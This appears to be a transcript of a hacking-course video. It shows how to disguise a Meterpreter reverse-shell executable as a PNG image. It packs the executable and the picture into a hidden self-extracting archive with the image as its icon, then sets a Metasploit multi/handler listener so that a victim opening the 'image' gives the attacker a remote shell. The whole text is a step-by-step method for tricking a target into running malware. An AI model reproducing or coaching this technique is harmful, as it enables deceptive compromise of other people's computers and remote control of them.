Welcome back. In this video, I want to show you a cool way that you can make your executable sim and look like another file. So what I'm going to do right now is I'm going to make our shell, which is right here .exe, to look like a car image, which is this one right here. Once the target makes that shell executable, we can have our meter shell and on our Linux machine. So what you need for this is an image, which is right here, or any file type you want. Doesn't need to be an image, you can just choose whatever file type you want, like PDF, Word, or anything. You just have to make our payload or our shell exactly the file type you want, and just follow along each step. It is the same for each file type. So two things: you are going to need a file that you want your executable to look like, and the executable itself, which is our shell. This is the same shell that we have created in our previous videos. Another thing that we are going to do is we are going to make an icon file from the png file. So what you have to do is go to any browser and type png to icon, and then we can choose this, choose file, which is our Dodge call. By the way, this is the coolest car ever to be created, my favorite car ever, which is a Dodge Challenger. So let me take what you think, and I'm gonna click convert. I'm gonna click download, and I'm going to download it in the same directory in which our png file and our executable file are. So I'm gonna click save, and as you can see here, this is our icon file and this is our image. After you have created your icon file, what you have to do is select both the png file and the execute file, right click on it and choose add to archive, and after that choose the zip and create sfx archive, and after that go to advanced, click sfx options, and we don't need on this. For the update, choose extract and update files, and for this overwrite all files. For the setup, enter the name, which is dodge.png. First, let me change the name of our car to dodge.png. Okay, so what we have to do is select both the png and the execute file and choose add to archive. For the archive format, choose zip, and for archiving option, choose create sfx archive and go to advanced and choose sfx options, and for the update, choose extract and update files and overwrite all files for the overwrite mode. For the setup, dodge.png and shell.exe. For the most, unpack to temporary folder and hide all. For the advanced, we don't need this one. For the module, we don't need this. For the modes, we have already set up. For the setup, we did this. For text, for the text and icon, load sfx icon from the file, and I'm going to choose our Dodge icon. For the update, we have saved it all. For the general, we don't need to do this, and click OK, and then click then OK. You can choose the name for the executable file, which looks like exactly our car. So this is it. As you can see, this is the icon, this is the png file, and this is our executable file, but it looks like our Dodge car. So if you go enter here, it is an exe file, but it looks like a car. So what you have to do is to change the name, go to add to archive, and in the first beginning you can give it whatever name you want, but for this it chose desktop. So let us go to our terminal and open a interpreter shell. So let us set our listener, which is use exploit multi handler, and set L port to 5555 and set L host, which is 192.168.88.248, and if I can show we have set our L port, our L host. So if I type run and go ahead open our executable file, it will open an image, but in the background it's an executable file. As you can see here, start the reverse TCP handler. Let's try to open it again. As you can see here, it opened an image. If I get back to my mission, sorry, I didn't set the payload. Set payload to Windows meter slash reverse TCP Windows meter reverse TCP. Okay, so and if I click run and open our executable file, which looks like an image, but in the reality it is our executable file. Voila. Okay, great. As you can see here, we have opened our interpreter shell. So if I type get UID, we are in the desktop, which is in the Windows, my local Windows host machine. And if I type ls, this is our .png and our shell. Okay, great. Now that we have covered this, we are finally ready to get into the post-exploitation section. And in here, we are going to go into details with the interpreter shell and what options it has. And also, we are going to check what post-exploitation modules we can run after hacking the target. See you in the next video.